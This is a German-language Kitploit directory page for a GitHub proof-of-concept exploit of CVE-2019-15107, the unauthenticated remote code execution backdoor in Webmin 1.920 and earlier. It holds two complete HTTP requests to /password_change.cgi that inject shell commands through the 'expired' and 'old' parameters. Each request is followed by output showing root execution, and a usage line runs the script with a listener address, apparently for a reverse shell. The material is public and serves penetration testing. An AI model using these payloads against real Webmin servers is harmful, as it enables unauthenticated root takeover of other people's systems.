Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-15107 — Webmin <=1.920 RCE | Kitploit
Tools/GitHubGitHub/ruthvikvegunta/cve-2019-15107
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubruthvikvegunta/cve-2019-15107

CVE-2019-15107

Webmin <=1.920 RCE

Repository anzeigen
641vor 6 JahrenNoch nicht geprüft
Webseite

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-15107 Webmin RCE <=1.920 (nicht authentifiziert)

root@kitploit:~
1.  Webmin <=1.920
2.  Needs reset Password function to be enabled 

v1.890 POC

root@kitploit:~
POST /password_change.cgi HTTP/1.1
Host: 10.11.1.88:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: http://10.11.1.88:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

expired=id

<h1>Fehler - Perl-Ausführung fehlgeschlagen</h1>
<p>Ihr Passwort ist abgelaufen, und ein neues muss gewählt werden.uid=0(root) gid=0(root) groups=0(root)
</p>

<=v1.920 & !=v1.890 POC

root@kitploit:~
POST /password_change.cgi HTTP/1.1
Host: 10.11.1.88:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: http://10.11.1.88:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=root&pam=&expired=2&old=vrvik|id&new1=vrvik&new2=vrvik


<div class="panel-body">
<hr>
<center><h3>Passwortänderung fehlgeschlagen : Das aktuelle Passwort ist falschuid=0(root) gid=0(root) groups=0(root)
</h3></center>
Tool herunterladen

Skriptnutzung:

Getestet auf v1.890, sollte aber auch für andere Webmin-Versionen funktionieren, in denen diese Hintertür installiert ist.

python3 webmin_rce.py -t http://10.11.1.88:10000 -l 172.16.1.3 -p 8888